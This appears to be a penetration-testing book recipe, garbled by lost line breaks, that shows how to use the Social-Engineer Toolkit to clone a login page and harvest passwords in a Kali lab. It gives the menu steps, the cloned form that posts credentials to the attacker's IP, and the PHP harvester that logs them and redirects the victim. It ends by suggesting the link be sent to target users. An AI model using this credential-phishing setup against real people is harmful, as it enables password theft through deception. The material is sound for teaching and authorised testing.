Social engineering attacks may be considered as a special kind of client-side attacks. In such attacks, the attacker has to convince the user that the attacker is a trustworthy counterpart and is authorized to receive the information the user has.
SET or the Social-Engineer Toolkit (https://www.trustedsec.com/social-engineer-toolkit/) is a set of tools designed to perform attacks against the human element; attacks, such as Spear-phishing, mass e-mails, SMS, rouge wireless access point, malicious websites, infected media, and so on.
In this recipe, we will use SET to create a password harvester web page and look at how it works and how attackers use it to steal a user's passwords.
setoolkit
set>
prompt, write 1
(for Social-Engineering Attacks
) and hit Enter.Website Attack Vectors
(option 2
).Credential Harvester Attack Method
(option 3
).Site Cloner
(option 2
).IP address for the POST back in Harvester/Tabnabbing
, which means the IP where the harvested credentials are going to be sent to. Here, we write the IP of our Kali machine in the host only network (vboxnet0): 192.168.56.1
.http://192.168.56.102/peruggia/index.php?action=login
.y
and hit Enter.http://192.168.56.1/
.Now we have an exact copy of the original login.
harvester
/test
./var/www/html
in your Kali Linux:cd /var/www/html
harvester_{date and time}.txt
cat harvester_2015-11-22 23:16:24.182192.txt
And that's it; we just need to send a link to our target users for them to visit our fake login to harvest their passwords.
SET creates three files when it clones a site; first, an index.html
, which is the copy of the original page and contains the login form. If we look at the code of the index.html
file that SET created in /var/www/html
in our Kali machine, we will find the following code:
<form action="http://192.168.56.1/post.php"http://192.168.56.1/index.php?action=login&check=1" method=post> <br> Username: <input type=text name=username><br> Password: <input type=password name=password><br> <br><input type=submit value=Login><br> </form>
Here, we can see that the username and password will be sent to post.php
in 192.168.56.1 (our Kali machine) when submitted, that is the second file that SET creates. All this file does is read the contents of the POST request and write them into a harvester_{date and time}.txt
file, the third file created by SET and the one that will store the information submitted by users. After writing the data in the file, the <meta>
tag redirects to the original login page, so the user will think that they wrote something incorrect in their username or password:
<?php $file = 'harvester_2015-11-22 23:16:24.182192.txt'; file_put_contents($file, print_r($_POST, true), FILE_APPEND); ?> <meta http-equiv="refresh" content="0; url=http://192.168.56.102/peruggia/index.php?action=login" />
3.143.17.27